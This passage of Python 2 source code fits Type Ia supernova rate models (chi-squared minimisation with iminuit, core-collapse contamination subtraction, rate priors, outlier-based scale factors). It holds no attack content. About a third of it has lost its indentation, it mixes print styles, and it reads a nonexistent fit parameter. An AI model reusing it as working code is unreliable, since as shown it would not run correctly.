            #BetaRatio = k*(1+zCenters)**(Beta)#/(1+zCenters)**MCBeta
            # Reweight the Ia sim by the current Beta before forming the CC fraction.
            BetaRatio = (1+zCentersFit)**(Beta)#/(1+zCenters)**MCBeta
            if dump and (self.nprint > simInd):
                print "Beta Ratio"
                print BetaRatio
                print "BadFracCCData"
                print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))
                print "bad NCCData"
                print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))*nData
            fracCCData = (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))
    if dump and (self.nprint > simInd):
        print 'abc'
        print "fracCCData2"
        print fracCCData
        print "unscaled fracCCData"
        print (1.0*nCC)/(1.0*(nCC+nIA))
    # Expected CC counts per data bin: either cheated from truth or estimated.
    if self.cheatCCSub:
        nCCData = TrueNCCData
        if dump and (self.nprint < simInd):
            print "Cheating CC Sub"
        assert(not(TrueNCCData is None))
    elif dump and (self.nprint > simInd):
        print 'def'
        print "Normal CC Sub"
    if not self.cheatCCSub:
        nCCData = nData*fracCCData
    if dump and (self.nprint > simInd):
        print "nCCData2"
        print nCCData
        if not(TrueNCCData is None):
            print "TrueNCCData"
            print TrueNCCData
    #print f_Js
    #Check if I am scaling errors down with increasing MC size. Make MC twice as large as "Data" to test.
    if dump: chi2Storage = []
    if dump: scaledNSimStor = []
    if dump: JSumTempNumStor = []
    if dump: JSumTempDenStor = []
    if dump:
        print "actually used NCC"
        #print nCC
        print nCCData
    if dump and (simInd < self.nprint):
        print "effmat"
        print effmat
        print "nData"
        print nData
        print "nCCData"
        print nCCData
        print "nSim"
        print nSim
        print nCCData
    # Main chi2 accumulation: one term per fit bin i, folding the sim sample
    # bins j through the efficiency matrix row.
    for row, nDataI, nCCDataI, i, zc in zip(effmat, nData, nCCData, range(self.nbinsFit), zCentersFit):
        if dump and (self.nprint > simInd):
            print 'effmat row'
            print row
            print 'nDataI'
            print nDataI
            print 'nCCDataI'
            print nCCDataI
        scaledNSimTemp = 0.0
        JSumTempNum = 0.0
        JSumTempDen = 0.0
        if dump and (simInd < self.nprint):
            print "nBinsSamp"
            print self.nbinsSamp
        assert(row.shape[0] == self.nbinsSamp)
        assert(nSim.shape[0] == self.nbinsSamp)
        assert(len(f_Js) == self.nbinsSamp)
        for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, range(self.nbinsSamp)):
            if dump and (self.nprint > simInd):
                print 'NGen J'
                print nSimJ
                print 'JSumTempNum contr'
                print nSimJ*f_J*eff*fnorm
                print 'JSumTempDen contr'
                print nSimJ*f_J*eff*fnorm*f_J*fnorm
            #if dump and (i != j) and self.cheatZ and (self.nprint < simInd):
            #    if nSimJ*f_J*eff*fnorm > 0:
            #        print " This should be zero but isnt "
            #        print nSimJ*f_J*eff*fnorm
            #        assert(0)
            # Numerator: predicted Ia count; denominator term: its variance contribution.
            JSumTempNum += nSimJ*f_J*eff*fnorm
            JSumTempDen += nSimJ*f_J*eff*fnorm*f_J*fnorm
        # Floor the variance contributions at 1 so empty bins do not divide by zero.
        dataFunc = np.maximum(nDataI ,1)
        #CCFunc = np.ceil(np.maximum(nCCDataI, 1))
        CCFunc = np.maximum(nCCDataI, 1)
        c2t = (nDataI - nCCDataI - JSumTempNum)**2/( dataFunc + CCFunc + JSumTempDen)
        if dump:
            JSumTempNumStor.append(JSumTempNum)
            JSumTempDenStor.append(JSumTempDen)
        if dump and (self.nprint > simInd):
            print i
            print 'nDataI'
            print nDataI
            print 'fnCCDataI'
            print nCCDataI
            print 'fnorm'
            print fnorm
            print "JSumTempNum tot"
            print JSumTempNum
            print "JSumTempDen tot"
            print JSumTempDen
            print "Chi2Bin"
            print c2t
        if dump:
            chi2Storage.append(c2t)
            if c2t > 5:
                print 'INSANITY CHECK ABOVE'
        # Chi2Temp += ((nDataI - nCCDataI - JSumTempNum)**2/(JSumTempNum + JSumTempDen))#*fnorm**2
        # Skip bins where both data and prediction are effectively empty.
        if nDataI > 1E-11 or JSumTempDen > 1E-11:
            Chi2Temp += c2t
    if dump and (self.nprint > simInd):
        print "JSumTempNum/Den"
        print JSumTempNumStor
        print JSumTempDenStor
    if dump:
        if (self.nprint >simInd):
            print Chi2Temp
            print kprior
            print betaprior
            print chi2Storage
            print "nData"
            print nData
            print "nCCData"
            print nCCData
        if priorRate is None:
            return Chi2Temp+kprior+betaprior , chi2Storage
        else:
            print "PRIORS3"
            print priorRate
            print "fit k"
            print k
            print 'MCK'
            print self.MCK
            print "fit beta"
            print Beta
            print 'MCBeta'
            print self.MCBeta
            # Prior is evaluated on the absolute rate: fitted offsets times the MC truth.
            print ratePrior(k*self.MCK, Beta + self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)
            return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll), chi2Storage
    else:
        # NOTE(review): dump is False on this branch, so this inner dump-guarded
        # block can never execute; it is dead code kept for symmetry.
        if dump and (self.nprint > simInd):
            print 'C2T'
            print Chi2Temp
            print kprior
            print betaprior
        if priorRate is None:
            return Chi2Temp+kprior+betaprior
        else:
            print "PRIORS3"
            print priorRate
            print "fit k"
            print k
            print 'MCK'
            print self.MCK
            print "fit beta"
            print Beta
            print 'MCBeta'
            print self.MCBeta
            print ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)
            return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)
zCentersSamp = (self.binListSamp[1:] + self.binListSamp[:-1])/2.0
zCentersFit = (self.binListFit[1:] + self.binListFit[:-1])/2.0
#Is this right? Everything else in the other side of the chi2 function should be Ia only
if self.cheatCCSub:
self.fracCCData = TrueNCC*1.0/nData
else:
self.fracCCData = (NCC*1.0)/(1.0*(NCC + NIa))
if (self.nprint > simInd):
print "nSim"
print nSim
print 'fracCCData'
print self.fracCCData
print "nData"
print nData
#fnorm = float(np.sum(nData*(1-self.fracCCData)))/float(np.sum(nSim))
fnorm = 1.0/240.0
#print "PRIORS"
#print self.priorZEff
#print self.priorRate
#print self.ratePriorErrUp
#print self.ratePriorErrDown
if self.Rate_Model == 'powerlaw':
lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta)
c2i, _ = lamChi2Dump(1.0, 0.0)
print "Chi2 init = {0}".format(round(c2i, 4))
elif self.Rate_Model == 'brokenpowerlaw':
lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta)
c2i, _ = lamChi2Dump(1.0, 0.0)
print "Chi2 init = {0}".format(round(c2i, 4))
elif self.Rate_Model == 'brokenpowerlawVar':
lamChi2 = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
lamChi2Dump = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta, zBreak = 1.0, error_zBreak = 0.1, limit_zBreak = (self.zminFit, self.zmaxFit))
c2i, _ = lamChi2Dump(1.0, 0.0)
print "Chi2 init = {0}".format(round(c2i, 4))
elif self.Rate_Model == 'discrete':
lamChi2 = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit )
lamChi2Dump = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, dump = True, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
c2i, _ = lamChi2Dump(1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0)
print "Chi2 init = {0}".format(round(c2i, 4))
MinObj = M(lamChi2, f_1 = 1.0, error_f_1 = 1.0, limit_f_1 = (0.0, None), f_2 = 1.0, error_f_2 = 1.0, limit_f_2 = (0.0, None), f_3 = 1.0, error_f_3 = 1.0, limit_f_3 = (0.0, None), f_4 = 1.0, error_f_4 = 1.0, limit_f_4 = (0.0, None), f_5 = 1.0, error_f_5 = 1.0, limit_f_5 = (0.0, None), f_6 = 1.0, error_f_6 = 1.0, limit_f_6 = (0.0, None), f_7 = 1.0, error_f_7 = 1.0, limit_f_7 = (0.0, None), f_8 = 1.0, error_f_8 = 1.0, limit_f_8 = (0.0, None), f_9 = 1.0, error_f_9 = 1.0, limit_f_9 = (0.0, None), f_10 = 1.0, error_f_10 = 1.0, limit_f_10 = (0.0, None), f_11 = 1.0,error_f_11 = 1.0, limit_f_11 = (0.0, None))
if self.Rate_Model == 'discrete':
c2f, c2stor = lamChi2Dump(MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11'])
else:
print "TEST DUMP HERE"
c2f, c2stor = lamChi2Dump(MinObj.values['k'], MinObj.values['Beta'])
#MinObj = M(lamChi2, k = 1.0, fix_k = True, Beta = 0.0, error_Beta = 0.1)
MinObj.set_strategy(2)
fmin, param = MinObj.migrad(nsplit= 10)
#fmin, param = MinObj.migrad()
#ErrDict = MinObj.minos()
self.covar = MinObj.np_covariance()
ErrDict = MinObj.minos(maxcall = 1000)
#plt.scatter(nData, c2stor)
#plt.xlabel('nData')
#plt.ylabel('chi2 in bin')
#plt.savefig(self.realName + 'Chi2VsnData.png')
#plt.clf()
if self.nprint > simInd:
print "Shapes of things"
print len(c2stor)
print nData.shape
print dataBins.shape
print self.binListFit.shape
print self.binListSamp.shape
#print DebugNIaPhot.shape
#print DebugNCCPhot.shape
#print DebugNIaTrue.shape
#print DebugNCCTrue.shape
for c2, nd in zip(c2stor, nData):
self.globalChi2Storage.append(c2)
self.globalNDataStorage.append(nd)
if self.Rate_Model == 'discrete':
fJList = [MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11']]
fJErrList = [MinObj.errors['f_1'],MinObj.errors['f_2'],MinObj.errors['f_3'],MinObj.errors['f_4'],MinObj.errors['f_5'],MinObj.errors['f_6'],MinObj.errors['f_7'],MinObj.errors['f_8'],MinObj.errors['f_9'],MinObj.errors['f_10'],MinObj.errors['f_11']]
self.fJList = fJList
self.fJErrList = fJErrList
self.Beta = None
self.k = None
self.kErr = None
self.BetaErr = None
print fJList
print fJErrList
else:
k = MinObj.values['k']
#kErr = MinObj.errors['k']
kErr = (np.abs(ErrDict['k']['lower']) + np.abs(ErrDict['k']['upper']))/2.0
Beta = MinObj.values['Beta']
#BetaErr = MinObj.errors['Beta']
BetaErr = (np.abs(ErrDict['Beta']['lower']) + np.abs(ErrDict['Beta']['upper']))/2.0
if self.Rate_Model == 'brokenpowerlawVar':
zBreak = MinObj.values['zBreak']
zBreakErr = MinObj.values['zBreakErr']
self.k = k
self.Beta = Beta
self.kErr = kErr
self.BetaErr = BetaErr
#/(self.nbins - 2)
self.BetaRatio = (1+zCentersFit)**(Beta)
self.fJList = None
print 'SCALE DEBUG'
print NCC
print NIa
print self.BetaRatio
print 'SCALE DEBUG2'
print np.sum(NCC)
print np.sum(NIa)
print np.sum(NIa*self.BetaRatio)
self.fracCCData = (NCC*1.0)/(1.0*(1.0*NCC + NIa*self.BetaRatio))
self.fracCCDataTot = (np.sum(NCC)*1.0)/(1.0*(1.0*np.sum(NCC) + np.sum(NIa*self.BetaRatio)))
print 'SCALE DEBUG3'
print self.fracCCData
print self.fracCCDataTot
print 'SCALE DEBUG4'
print OrigNCC
print np.sum(OrigNCC)
print CCScale
#print self.fracCCDataTot
#print type(self.fracCCDataTot)
#assert(type(self.fracCCDataTot) == float)
print "Chi2 final = {0}".format(round(lamChi2Dump(self.k, self.Beta)[0], 4))
self.chi2 = fmin.fval
print "Chi2final? = {0}".format(round(fmin.fval, 4))
if not(self.priorRate is None):
ratePriorFinalVal = ratePrior(self.k*self.MCK, self.Beta+self.MCBeta, self.priorRate, self.priorZEff, self.ratePriorErrUp, self.ratePriorErrDown, self.ratePriorErrAll )
c2NoPrior = chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, self.k, self.Beta, dump = False, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC)
print "RATE PRIOR FINAL"
print ratePriorFinalVal
print "Chi2final? = {0}".format(round(fmin.fval, 4))
print "Chi2FinalNoPrior"
print c2NoPrior
#fJs = np.ones(zCenters.shape)
'''
try:
if (Rate_Model != 'discrete'):
plt.clf()
MinObj.draw_contour('k','Beta', nsigma=3)
plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
locs, labels = plt.yticks()
labels = locs + np.cos(cosVal)
plt.yticks(labels)
plt.clf()
#xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0)
#fig, ax = plt.subplots(1)
#plt.clf()
#CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0])
#ax.clabel(CS, fontsize=7, inline=1)
#ax.set_xlabel('k')
#ax.set_ylabel('Beta')
#if Blind:
# ax.set_xticklabels([])
# ax.set_yticklabels([])
#plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))
#plt.close()
except:
print "Plot Fail A"
try:
if (Rate_Model != 'discrete'):
plt.clf()
MinObj.draw_profile('Beta', text = False)
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
plt.savefig('{0}_{1}_beta_contour.png'.format(self.realName, self.simName))
plt.clf()
except:
print "Plot Fail C"
try:
if Rate_Model != 'discrete':
Betas = np.linspace(self.Beta - 0.5, self.Beta + 0.5, 51)
FCNs = []
for bTemp in Betas:
FCN = lamChi2( self.k, bTemp)
FCNs.append(FCN)
plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour')
plt.legend()
plt.xlabel('Beta')
plt.ylabel('Chi2')
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
plt.savefig('{0}_{1}_beta_mycontour.png'.format(self.realName, self.simName))
plt.clf()
except:
print "Plot Fail D"
if Rate_Model != 'discrete':
plt.clf()
ax = plt.axes()
Betas = np.linspace(self.Beta - 0.1, self.Beta + 0.1, 501)
FCNs = []
for bTemp in Betas:
FCN = lamChi2( self.k, bTemp)
FCNs.append(FCN)
plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour')
plt.legend()
plt.xlabel('Beta')
plt.ylabel('Chi2')
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
ax.set_xticklabels(labels)
print "FCNs"
print FCNs
plt.savefig('{0}_{1}_beta_myzoomcontour.png'.format(self.realName, self.simName))
plt.clf()
plt.clf()
ax = plt.axes()
ks = np.linspace(self.k - 0.1, self.k + 0.1, 501)
FCNs = []
for kTemp in ks:
FCN = lamChi2( kTemp,self.Beta)
FCNs.append(FCN)
plt.plot(ks, FCNs, c = 'k', label = 'Non Minuit Contour')
plt.legend()
plt.xlabel('k')
plt.ylabel('Chi2')
print "FCNs"
print FCNs
plt.savefig('{0}_{1}_k_myzoomcontour.png'.format(self.realName, self.simName))
plt.clf()
df = np.array(FCNs[1:]) - np.array(FCNs[:-1])
inds = np.where(df > 0)[0]
print 'inds'
print inds
print inds < 250
print np.where(inds < 250)
inds = inds[np.where(inds < 250)]
print 'inds'
print inds
print "INDSSHAPE"
print inds.shape
if inds.shape[0]:
print "MINUIT IS PROBABLY MAD. HERES WHY"
print inds
print Betas[inds]
if inds.shape[0] > 1:
inds = inds[-1]
print inds
print Betas[inds]
lamChi2Dump(self.k, Betas[inds -3])
print "MINUIT MAD 2"
lamChi2Dump(self.k, Betas[inds -2])
print "MINUIT MAD 3"
lamChi2Dump(self.k, Betas[inds -1])
print "MINUIT MAD 4"
lamChi2Dump(self.k, Betas[inds])
print "MINUIT MAD 5"
lamChi2Dump(self.k, Betas[inds + 1])
print "MINUIT MAD 6"
lamChi2Dump(self.k, Betas[inds + 2])
print "MINUIT MAD 7"
lamChi2Dump(self.k, Betas[inds + 3])
print "END MINUIT MAD"
try:
if (Rate_Model != 'discrete'):
plt.clf()
MinObj.draw_mncontour('k','Beta', nsigma=3)
plt.savefig('{0}_{1}_k_beta_mncontour.png'.format(self.realName, self.simName))
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
locs, labels = plt.yticks()
labels = locs + np.cos(cosVal)
plt.yticks(labels)
plt.clf()
MinObj.draw_mnprofile('Beta', text = False, subtract_min = True)
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
plt.savefig('{0}_{1}_beta_mncontour.png'.format(self.realName, self.simName))
plt.clf()
#xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0)
#fig, ax = plt.subplots(1)
#plt.clf()
#CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0])
#ax.clabel(CS, fontsize=7, inline=1)
#ax.set_xlabel('k')
#ax.set_ylabel('Beta')
#if Blind:
# ax.set_xticklabels([])
# ax.set_yticklabels([])
#plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))
#plt.close()
except:
print "Plot Fail B"
pass
#plt.axhline(y = self.MCBeta, c = 'k', label = 'True Beta')
#plt.axhline(y = Beta + self.MCBeta, c = 'g', label= 'Best Fit Beta')
#plt.axvline(x = k, label = 'Best Fit k')
'''
'''
def chi2V2(self, fJs, fJErrs, zCenters, k, Beta):
fitfJs = k*(1+zCenters)**Beta
Chi2Temp = 0
for fJ, fitfJ, fJErr in zip(fJs, fitfJs, fJErrs):
Chi2Temp += (fJ - fitfJ)**2/(fJ + fJErr)
return Chi2Temp
'''
def weakPrior(value, priorTuple):
    """Soft box prior: flat (returns 1) strictly inside (lo, hi), with a
    quartic penalty growing from the nearer boundary outside or on it.
    priorTuple is a (lo, hi) pair."""
    lo, hi = priorTuple
    if value >= hi:
        return (value - hi) ** 4
    if value <= lo:
        return (value - lo) ** 4
    return 1
def ratePrior(fitK, fitBeta, priorRate, zEffPrior, priorRateErrUp = None, priorRateErrDown = None, priorRateErrAll = None):
    """Gaussian chi2 penalty pulling the fitted rate toward an external measurement.

    The fitted rate is evaluated at the prior's effective redshift,
    fitRate = fitK*(1+zEffPrior)**fitBeta, and compared to priorRate with
    asymmetric errors: priorRateErrUp above the prior, priorRateErrDown below,
    falling back to priorRateErrAll when the one-sided error is None.

    Returns (fitRate - priorRate)**2 / err**2.

    Raises TypeError if the required error (one-sided or *All fallback) is None.

    Note: print statements were consolidated into py2/py3-compatible
    single-argument print(...) calls; output content is unchanged.
    """
    print("PRIOR")
    print(priorRate)
    print(zEffPrior)
    print(priorRateErrUp)
    print(priorRateErrDown)
    print("Fit Beta/k")
    print(fitBeta)
    print(fitK)
    fitRate = fitK*(1+zEffPrior)**fitBeta
    print('Fit Rate')
    print(fitRate)
    print("PriorChi2")
    # Asymmetric errors: use the one-sided error when supplied, else the
    # symmetric fallback. fitRate == priorRate falls in the "down" branch,
    # matching the original (strict >) comparison.
    if fitRate > priorRate:
        err = priorRateErrUp if priorRateErrUp is not None else priorRateErrAll
    else:
        err = priorRateErrDown if priorRateErrDown is not None else priorRateErrAll
    priorChi2 = (fitRate - priorRate)**2/err**2
    print(priorChi2)
    return priorChi2
def getCCScale(simCat, dataCat, MURESWindow = (-1, 1), zbins = [0.0, 0.3, 0.6, 0.9, 1.2], Beta = None, binList = None, fracCCData = None, outfilePrefix = 'Test', Rate_Model = 'powerlaw', f_Js = None, returnHist = False, debug = False, simInd = 100, ztype = 'zPHOT'):
    """Estimate a per-redshift-bin core-collapse scale factor S from Hubble-residual outliers.

    For each z bin, compares the outlier fraction (|MURES| outside MURESWindow)
    in data against the sim Ia/CC split, solving
        S = (R*N_Ia_beta - n_Ia_outlier) / (n_CC_outlier - R*N_CC)
    where R is the data outlier fraction and N_Ia_beta is the sim Ia count
    reweighted by the current rate model (Beta power law, or f_Js when
    Rate_Model == 'discrete').

    Returns (CCScales, CCScaleErrs) lists, one entry per z bin; NaN/negative
    solutions fall back to scale 1.0 with error 1.0. When returnHist is True
    also returns three histogram lists (currently always left empty).

    NOTE(review): zbins has a mutable list default -- it is only read here, but
    consider a None sentinel. Bare except around the S computation swallows
    ZeroDivisionError (empty bins) by design; confirm no other errors should
    propagate. simCat/dataCat are assumed to be structured arrays / catalogs
    with MURES, SIM_TYPE_INDEX and ztype fields -- TODO confirm against caller.
    """
    #import iminuit as iM
    #from iminuit import Minuit as M
    if debug:
        print "Check this"
        print Rate_Model
        print f_Js
        print Beta
        print fracCCData
        print "Done Checking"
    CCScales = []
    CCScaleErrs = []
    # These histogram accumulators are returned when returnHist is True but are
    # never filled in the current implementation.
    simIaHists = []
    simCCHists = []
    dataHists = []
    if not(f_Js is None):
        f_Js = np.array(f_Js)
    # Full (pre-outlier-cut) sim split by type; SIM_TYPE_INDEX == 1 marks Ia.
    allSimCC = simCat[simCat['SIM_TYPE_INDEX'].astype(int) != 1]
    allSimIa = simCat[simCat['SIM_TYPE_INDEX'].astype(int) == 1]
    allData = np.copy(dataCat)
    #fnorm2 = float(dataCat.shape[0])/float(np.sum(simHist))
    # Keep only Hubble-residual outliers (outside the MURES window).
    simCat = simCat[(simCat['MURES'] < MURESWindow[0]) | (simCat['MURES'] > MURESWindow[1]) ]
    dataCat = dataCat[(dataCat['MURES'] < MURESWindow[0]) | (dataCat['MURES'] > MURESWindow[1]) ]
    for zl, zh in zip(zbins[:-1], zbins[1:]):
        # Outlier and total populations restricted to this z bin.
        tempSim = simCat[(simCat[ztype] < zh) & (simCat[ztype] > zl)]
        tempData = dataCat[(dataCat[ztype] < zh) & (dataCat[ztype] > zl)]
        allSimCCZbin = allSimCC[(allSimCC[ztype] < zh) & (allSimCC[ztype] > zl)]
        allSimIaZbin = allSimIa[(allSimIa[ztype] < zh) & (allSimIa[ztype] > zl)]
        if debug:
            print "all Sim CC Zbin/IaZbin"
            print allSimCCZbin.shape[0]
            print allSimIaZbin.shape[0]
        allDataZbin = allData[(allData[ztype] < zh) & (allData[ztype] > zl)]
        tempSimCC = tempSim[tempSim['SIM_TYPE_INDEX'] != 1]
        tempSimIa = tempSim[tempSim['SIM_TYPE_INDEX'] == 1]
        # R: fraction of data in this z bin that are outliers.
        R = float(tempData.shape[0])/float(allDataZbin.shape[0])
        if debug:
            print "R"
            print R
            print "Hist CC, outlier and total"
            print tempSim.shape[0]
            print allSimCCZbin.shape[0]
            print "pre Beta Correction allSimIa"
            print tempData.shape[0]
            print allSimIaZbin.shape[0]
        # Reweight the sim Ia total by the fitted rate before solving for S.
        if Rate_Model == 'discrete':
            hist, bins = np.histogram(allSimIaZbin[ztype], bins = 11)
            if debug:
                print 'fJ shape'
                print f_Js.shape
                print f_Js
                print hist
                print bins
            betaCorrAllSimIaZbin =np.sum(hist*f_Js)
        else:
            betaCorrAllSimIaZbin =np.sum((1+ allSimIaZbin[ztype])**Beta)
        #S = float(np.array(R*histSAllIa) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*histSAllCC))
        try:
            if debug:
                print "Test S"
                print R
                print betaCorrAllSimIaZbin
                print tempSimIa.shape[0]
                print tempSimCC.shape[0]
                print allSimCCZbin.shape
                print 'EEE'
                print np.array(R*betaCorrAllSimIaZbin)
                print 'DDD'
                print np.array(tempSimIa.shape[0])
                print 'CCC'
                print (np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
                print "AAA"
                print (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
                print "BBB"
            #S = (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
            S = float(np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
        except:
            # Empty bins / zero denominators land here; NaN triggers the
            # scale-1.0 fallback below.
            S = np.nan
        if debug:
            print "S WTF"
            print S
            print "Uncertainty Related Bullshit"
            '''
            print "Delta R"
            dR = np.sqrt(histD + histDAll)
            print dR
            num1 = np.sqrt(np.sqrt((dR/R)**2 + histSAllIa) + tempSimIa.shape[0])
            num2 = np.sqrt(np.sqrt((dR/R)**2 + histSAllCC) + tempSimCC.shape[0])
            den1 = (R*histSAllIa - tempSimIa.shape[0])
            den2 = (tempSimCC.shape[0] - R*histSAllCC)
            dS = np.sqrt((num1/den1)**2 + (num2/den2)**2)
            '''
        # Propagated Poisson uncertainty on S from the four counts (R treated
        # as exact -- the ddR term is commented out).
        #ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - histSAllIa*R)/(tempSimCC.shape[0] - R*histSAllCC)**2
        #ddNCC = np.sqrt(histSAllCC)*R*(histSAllIa*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2
        #ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)
